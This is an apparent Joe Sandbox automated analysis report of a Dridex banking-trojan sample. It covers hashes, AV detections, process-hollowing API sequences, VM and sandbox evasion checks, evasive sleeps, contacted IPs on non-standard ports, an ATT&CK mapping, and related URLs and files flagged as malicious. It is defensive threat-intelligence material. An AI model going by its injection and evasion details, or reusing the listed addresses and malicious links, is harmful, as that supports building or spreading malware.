Play interactive tour

Edit tour

Analysis Report Dridex

Overview

General Information

Sample Name:	Dridex (renamed file extension from none to exe)
Analysis ID:	393200
MD5:	6e5654da58c03df6808466f0197207ed
SHA1:	594f33ad9d7f85625a88c24903243ba9788fba86
SHA256:	e30b76f9454a5fd3d11b5792ff93e56c52bf5dfba6ab375c3b96e17af562f5fc
Tags:	DridexProcessHollowingRunPE
Infos:
Most interesting Screenshot:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for submitted file

Contain functionality to detect virtual machines

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Program does not show much activity (idle)

Queries the installation date of Windows

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

Dridex.exe (PID: 6616 cmdline: 'C:\Users\user\Desktop\Dridex.exe' MD5: 6E5654DA58C03DF6808466F0197207ED)

Dridex.exe (PID: 6660 cmdline: C:\Users\user\Desktop\Dridex.exe MD5: 6E5654DA58C03DF6808466F0197207ED)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: Dridex.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: Dridex.exe	Metadefender: Detection: 86%			Perma Link
Source: Dridex.exe	ReversingLabs: Detection: 100%

Machine Learning detection for sample

Show sources

Source: Dridex.exe

Joe Sandbox ML: detected

Source: 0.2.Dridex.exe.28a0000.7.unpack	Avira: Label: TR/Taranis.403
Source: 0.0.Dridex.exe.400000.0.unpack	Avira: Label: TR/Taranis.403
Source: 0.2.Dridex.exe.2470000.6.unpack	Avira: Label: TR/Taranis.403
Source: 1.0.Dridex.exe.400000.0.unpack	Avira: Label: TR/Taranis.403
Source: 0.2.Dridex.exe.400000.1.unpack	Avira: Label: TR/Taranis.403
Source: 0.1.Dridex.exe.400000.0.unpack	Avira: Label: TR/Taranis.403

Source: Dridex.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\Dridex.exe	Code function: 0_2_00401160 MapViewOfFile,GetLocaleInfoW,FindFirstFileA,MessageBoxIndirectA,RegDeleteKeyW,GetCharABCWidthsFloatA,FindNextFileW,EnableWindow,GetTimeZoneInformation,ExitProcess,		0_2_00401160
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 0_1_00401160 MapViewOfFile,GetLocaleInfoW,FindFirstFileA,RegDeleteKeyW,GetCharABCWidthsFloatA,FindNextFileW,GetTimeZoneInformation,ExitProcess,		0_1_00401160

Source: global traffic	TCP traffic: 192.168.2.6:49710 -> 94.73.155.12:2448
Source: global traffic	TCP traffic: 192.168.2.6:49722 -> 103.252.100.44:4493
Source: global traffic	TCP traffic: 192.168.2.6:49723 -> 89.108.71.148:8843
Source: global traffic	TCP traffic: 192.168.2.6:49725 -> 221.132.35.56:8843

Source: unknown	TCP traffic detected without corresponding DNS query: 94.73.155.12
Source: unknown	TCP traffic detected without corresponding DNS query: 94.73.155.12
Source: unknown	TCP traffic detected without corresponding DNS query: 94.73.155.12
Source: unknown	TCP traffic detected without corresponding DNS query: 103.252.100.44
Source: unknown	TCP traffic detected without corresponding DNS query: 103.252.100.44
Source: unknown	TCP traffic detected without corresponding DNS query: 103.252.100.44
Source: unknown	TCP traffic detected without corresponding DNS query: 89.108.71.148
Source: unknown	TCP traffic detected without corresponding DNS query: 89.108.71.148
Source: unknown	TCP traffic detected without corresponding DNS query: 89.108.71.148
Source: unknown	TCP traffic detected without corresponding DNS query: 221.132.35.56
Source: unknown	TCP traffic detected without corresponding DNS query: 221.132.35.56
Source: unknown	TCP traffic detected without corresponding DNS query: 221.132.35.56
Source: unknown	TCP traffic detected without corresponding DNS query: 94.73.155.12
Source: unknown	TCP traffic detected without corresponding DNS query: 94.73.155.12
Source: unknown	TCP traffic detected without corresponding DNS query: 94.73.155.12
Source: unknown	TCP traffic detected without corresponding DNS query: 103.252.100.44
Source: unknown	TCP traffic detected without corresponding DNS query: 103.252.100.44
Source: unknown	TCP traffic detected without corresponding DNS query: 103.252.100.44
Source: unknown	TCP traffic detected without corresponding DNS query: 89.108.71.148
Source: unknown	TCP traffic detected without corresponding DNS query: 89.108.71.148
Source: unknown	TCP traffic detected without corresponding DNS query: 89.108.71.148
Source: unknown	TCP traffic detected without corresponding DNS query: 221.132.35.56
Source: unknown	TCP traffic detected without corresponding DNS query: 221.132.35.56
Source: unknown	TCP traffic detected without corresponding DNS query: 221.132.35.56
Source: unknown	TCP traffic detected without corresponding DNS query: 94.73.155.12
Source: unknown	TCP traffic detected without corresponding DNS query: 94.73.155.12
Source: unknown	TCP traffic detected without corresponding DNS query: 94.73.155.12
Source: unknown	TCP traffic detected without corresponding DNS query: 103.252.100.44
Source: unknown	TCP traffic detected without corresponding DNS query: 103.252.100.44
Source: unknown	TCP traffic detected without corresponding DNS query: 103.252.100.44
Source: unknown	TCP traffic detected without corresponding DNS query: 89.108.71.148
Source: unknown	TCP traffic detected without corresponding DNS query: 89.108.71.148
Source: unknown	TCP traffic detected without corresponding DNS query: 89.108.71.148
Source: unknown	TCP traffic detected without corresponding DNS query: 221.132.35.56
Source: unknown	TCP traffic detected without corresponding DNS query: 221.132.35.56

Source: Dridex.exe, 00000000.00000002.333593653.000000000066A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\Dridex.exe

Code function: 0_2_02370018 LoadLibraryA,CreateProcessW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CreateFileW,TerminateProcess,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,CreateFileW,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,

0_2_02370018

Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_2_0040AC50	1_2_0040AC50
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_2_00412888	1_2_00412888
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_2_0040BB48	1_2_0040BB48
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_2_0041434E	1_2_0041434E
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_2_00407B1D	1_2_00407B1D
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_2_00413F88	1_2_00413F88
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_1_0040AC50	1_1_0040AC50
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_1_00412888	1_1_00412888
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_1_0040BB48	1_1_0040BB48
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_1_0041434E	1_1_0041434E
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_1_00407B1D	1_1_00407B1D
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_1_00413F88	1_1_00413F88

Source: Dridex.exe, 00000000.00000002.333632084.0000000000BB0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs Dridex.exe
Source: Dridex.exe, 00000000.00000002.333620542.0000000000B80000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameMFC42.DLL.MUIR vs Dridex.exe
Source: Dridex.exe, 00000000.00000002.333741586.0000000002470000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamemation.exe vs Dridex.exe
Source: Dridex.exe, 00000001.00000002.594794789.0000000003F50000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Dridex.exe
Source: Dridex.exe	Binary or memory string: OriginalFilenamemation.exe vs Dridex.exe

Source: Dridex.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal84.evad.winEXE@3/0@0/4

Source: C:\Users\user\Desktop\Dridex.exe

0_2_02370018

Source: C:\Users\user\Desktop\Dridex.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Dridex.exe	Metadefender: Detection: 86%
Source: Dridex.exe	ReversingLabs: Detection: 100%

Source: C:\Users\user\Desktop\Dridex.exe

File read: C:\Users\user\Desktop\Dridex.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Dridex.exe 'C:\Users\user\Desktop\Dridex.exe'
Source: C:\Users\user\Desktop\Dridex.exe	Process created: C:\Users\user\Desktop\Dridex.exe C:\Users\user\Desktop\Dridex.exe
Source: C:\Users\user\Desktop\Dridex.exe	Process created: C:\Users\user\Desktop\Dridex.exe C:\Users\user\Desktop\Dridex.exe	Jump to behavior

Source: Dridex.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\Dridex.exe

Unpacked PE file: 1.2.Dridex.exe.400000.0.unpack .text:R;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.data1:W;.reloc:R;

Source: Dridex.exe

Static PE information: real checksum: 0x22e32 should be: 0x2b73e

Source: C:\Users\user\Desktop\Dridex.exe	Code function: 0_2_004025C0 push eax; ret	0_2_004025EE
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 0_2_023740C0 push eax; ret	0_2_023740EE
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 0_1_004025C0 push eax; ret	0_1_004025EE
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_2_00410075 push 4D8A84E3h; retf	1_2_0041007A
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_2_0041009D push 4D8A84E3h; retf	1_2_004100A2
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_2_0041017B push cs; iretd	1_2_0041017E
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_2_004105D4 pushfd ; ret	1_2_004105E5
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_2_004105AF pushfd ; ret	1_2_004105BD
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_2_004101B6 push cs; retf	1_2_004101BE
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_2_00414EDC push edi; ret	1_2_00414EE2
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_1_00410075 push 4D8A84E3h; retf	1_1_0041007A
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_1_0041009D push 4D8A84E3h; retf	1_1_004100A2
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_1_0041017B push cs; iretd	1_1_0041017E
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_1_004105D4 pushfd ; ret	1_1_004105E5
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_1_004105AF pushfd ; ret	1_1_004105BD
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_1_004101B6 push cs; retf	1_1_004101BE
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_1_00414EDC push edi; ret	1_1_00414EE2

Source: C:\Users\user\Desktop\Dridex.exe

Code function: 0_2_00401C40 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,

0_2_00401C40

Source: C:\Users\user\Desktop\Dridex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contain functionality to detect virtual machines

Show sources

Source: C:\Users\user\Desktop\Dridex.exe

Code function: VBoxService.exe VBoxService.exe VBoxService.exe VBoxService.exe vmtoolsd.exe vmtoolsd.exe

0_2_02370018

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Show sources

Source: C:\Users\user\Desktop\Dridex.exe

File opened: C:\myapp.exe

Jump to behavior

Source: C:\Users\user\Desktop\Dridex.exe	Thread delayed: delay time: 325000			Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe	Thread delayed: delay time: 293000			Jump to behavior

Source: C:\Users\user\Desktop\Dridex.exe TID: 6664	Thread sleep time: -318000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe TID: 6664	Thread sleep time: -167000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe TID: 6664	Thread sleep time: -148000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe TID: 6664	Thread sleep time: -325000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe TID: 6664	Thread sleep time: -155000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe TID: 6664	Thread sleep time: -149000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe TID: 6664	Thread sleep time: -293000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe TID: 6664	Thread sleep time: -169000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe TID: 6664	Thread sleep time: -123000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe TID: 6664	Thread sleep time: -129000s >= -30000s	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\Dridex.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Dridex.exe	Code function: 0_2_00401160 MapViewOfFile,GetLocaleInfoW,FindFirstFileA,MessageBoxIndirectA,RegDeleteKeyW,GetCharABCWidthsFloatA,FindNextFileW,EnableWindow,GetTimeZoneInformation,ExitProcess,		0_2_00401160
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 0_1_00401160 MapViewOfFile,GetLocaleInfoW,FindFirstFileA,RegDeleteKeyW,GetCharABCWidthsFloatA,FindNextFileW,GetTimeZoneInformation,ExitProcess,		0_1_00401160

Source: C:\Users\user\Desktop\Dridex.exe	Thread delayed: delay time: 159000	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe	Thread delayed: delay time: 167000	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe	Thread delayed: delay time: 148000	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe	Thread delayed: delay time: 325000	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe	Thread delayed: delay time: 155000	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe	Thread delayed: delay time: 149000	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe	Thread delayed: delay time: 293000	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe	Thread delayed: delay time: 169000	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe	Thread delayed: delay time: 123000	Jump to behavior
Source: C:\Users\user\Desktop\Dridex.exe	Thread delayed: delay time: 129000	Jump to behavior

Source: Dridex.exe	Binary or memory string: VBoxService.exe
Source: Dridex.exe	Binary or memory string: vmtoolsd.exe

Source: C:\Users\user\Desktop\Dridex.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Dridex.exe	Code function: 0_2_02373BD4 push dword ptr fs:[00000030h]	0_2_02373BD4
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_2_0040E874 mov eax, dword ptr fs:[00000030h]	1_2_0040E874
Source: C:\Users\user\Desktop\Dridex.exe	Code function: 1_1_0040E874 mov eax, dword ptr fs:[00000030h]	1_1_0040E874

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\user\Desktop\Dridex.exe

0_2_02370018

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\Dridex.exe

Memory written: C:\Users\user\Desktop\Dridex.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Dridex.exe	Code function: LoadLibraryA,CreateProcessW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CreateFileW,TerminateProcess,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,CreateFileW,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc, explorer.exe.\		0_2_02370018
Source: C:\Users\user\Desktop\Dridex.exe	Code function: LoadLibraryA,CreateProcessW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CreateFileW,TerminateProcess,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,CreateFileW,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc, explorer.exe.\		0_2_02370018

Source: C:\Users\user\Desktop\Dridex.exe

Process created: C:\Users\user\Desktop\Dridex.exe C:\Users\user\Desktop\Dridex.exe

Jump to behavior

Source: Dridex.exe, 00000001.00000002.593513151.0000000002230000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: Dridex.exe, 00000001.00000002.593513151.0000000002230000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: Dridex.exe, 00000001.00000002.593513151.0000000002230000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: Dridex.exe, 00000001.00000002.593513151.0000000002230000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Dridex.exe	Code function: MapViewOfFile,GetLocaleInfoW,FindFirstFileA,MessageBoxIndirectA,RegDeleteKeyW,GetCharABCWidthsFloatA,FindNextFileW,EnableWindow,GetTimeZoneInformation,ExitProcess,		0_2_00401160
Source: C:\Users\user\Desktop\Dridex.exe	Code function: MapViewOfFile,GetLocaleInfoW,FindFirstFileA,RegDeleteKeyW,GetCharABCWidthsFloatA,FindNextFileW,GetTimeZoneInformation,ExitProcess,		0_1_00401160

Source: C:\Users\user\Desktop\Dridex.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\Desktop\Dridex.exe

Code function: 0_2_00401160 MapViewOfFile,GetLocaleInfoW,FindFirstFileA,MessageBoxIndirectA,RegDeleteKeyW,GetCharABCWidthsFloatA,FindNextFileW,EnableWindow,GetTimeZoneInformation,ExitProcess,

0_2_00401160

Source: C:\Users\user\Desktop\Dridex.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection222	Virtualization/Sandbox Evasion221	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection222	LSASS Memory	Security Software Discovery21	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Virtualization/Sandbox Evasion221	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing11	NTDS	Process Discovery3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery23	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Dridex.exe	86%	Metadefender		Browse
Dridex.exe	100%	ReversingLabs	Win32.Backdoor.Drixed
Dridex.exe	100%	Avira	TR/Taranis.403
Dridex.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.Dridex.exe.28a0000.7.unpack	100%	Avira	TR/Taranis.403	Download File
0.0.Dridex.exe.400000.0.unpack	100%	Avira	TR/Taranis.403	Download File
1.2.Dridex.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.Dridex.exe.2470000.6.unpack	100%	Avira	TR/Taranis.403	Download File
1.0.Dridex.exe.400000.0.unpack	100%	Avira	TR/Taranis.403	Download File
0.2.Dridex.exe.400000.1.unpack	100%	Avira	TR/Taranis.403	Download File
0.1.Dridex.exe.400000.0.unpack	100%	Avira	TR/Taranis.403	Download File
0.2.Dridex.exe.2380000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.1.Dridex.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
103.252.100.44	unknown	Indonesia	59147	IDNIC-DRUPADI-AS-IDPTDrupadiPrimaID	false
89.108.71.148	unknown	Russian Federation	43146	AGAVA3RU	false
221.132.35.56	unknown	Viet Nam	45899	VNPT-AS-VNVNPTCorpVN	false
94.73.155.12	unknown	Turkey	34619	CIZGITR	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	393200
Start date:	20.04.2021
Start time:	09:53:06
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Dridex (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.evad.winEXE@3/0@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 51.4% (good quality ratio 48.9%) Quality average: 76.7% Quality standard deviation: 29%
HCA Information:	Successful, ratio: 100% Number of executed functions: 25 Number of non-executed functions: 20
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/393200/sample/Dridex.exe

Simulations

Behavior and APIs

Time	Type	Description
09:54:22	API Interceptor	11x Sleep call for process: Dridex.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VNPT-AS-VNVNPTCorpVN	PO45937008ADENGY.exe	Get hash	malicious	Browse	123.31.43.181
	8QGglvUeYO.exe	Get hash	malicious	Browse	103.42.58.103
	networkmanager	Get hash	malicious	Browse	14.188.135.58
	WUHU95Apq3	Get hash	malicious	Browse	113.183.33.163
	G0ESHzsrvg.exe	Get hash	malicious	Browse	103.255.237.180
	6OUYcd3GIs.exe	Get hash	malicious	Browse	103.255.237.180
	http://singaedental.vn/wp-content/lQ/	Get hash	malicious	Browse	202.92.7.113
	http://covisa.com.br/paypal-closed-y2hir/ABqY1RAPjaNGnFw9flbsTw3mbHnBB1OUWRV6kbbvfAryr4bmEsDoeNMECXf3fg6io/	Get hash	malicious	Browse	202.92.7.113
	Adjunto_2021.doc	Get hash	malicious	Browse	202.92.7.113
	Dok 0501 012021 Q_93291.doc	Get hash	malicious	Browse	202.92.7.113
	11_extracted.exe	Get hash	malicious	Browse	103.207.39.131
	https://correolimpio.telefonica.es/atp/url-check.php?URL=https%3A%2F%2Fnhabeland.vn%2Fsercurirys%2FRbvPk%2F&D=53616c7465645f5f824c0b393b6f3e2d3c9a50d9826547979a4ceae42fdf4a21ec36a319de1437ef72976b2e7ef710bdb842a205880238cf08cf04b46eccce50114dbc4447f1aa62068b81b9d426da6b&V=1	Get hash	malicious	Browse	103.255.237.61
	SecuriteInfo.com.ArtemisC5924E341E9E.exe	Get hash	malicious	Browse	103.255.237.239
	INFO 2020 DWP_947297.doc	Get hash	malicious	Browse	14.177.232.31
	MESSAGIO 83-46447904.doc	Get hash	malicious	Browse	123.31.24.142
	Order List and Quantities.ppt	Get hash	malicious	Browse	103.207.39.131
	Purchase list.ppt	Get hash	malicious	Browse	103.207.39.131
	2020141248757837844.ppt	Get hash	malicious	Browse	103.207.39.131
	PurchaseOrder#Q7677.ppt	Get hash	malicious	Browse	103.207.39.131
	Remittance Scan00201207.ppt	Get hash	malicious	Browse	103.207.39.131
AGAVA3RU	Zh2Gv0wJtk.exe	Get hash	malicious	Browse	80.78.246.22
	c3XD756MSN.exe	Get hash	malicious	Browse	89.108.88.140
	O6RQ377jNN.exe	Get hash	malicious	Browse	89.108.88.140
	SecuriteInfo.com.Trojan.Siggen12.58144.411.exe	Get hash	malicious	Browse	89.108.88.140
	7Q1bVVkIIL.exe	Get hash	malicious	Browse	89.108.88.140
	R2o3eEx5Zj.exe	Get hash	malicious	Browse	89.108.88.140
	5MZKivSsq7.exe	Get hash	malicious	Browse	80.78.245.80
	z9mXoeDPej.exe	Get hash	malicious	Browse	89.108.88.140
	SecuriteInfo.com.W32.AIDetect.malware1.20229.exe	Get hash	malicious	Browse	89.108.88.140
	SecuriteInfo.com.W32.AIDetect.malware1.15067.exe	Get hash	malicious	Browse	89.108.88.140
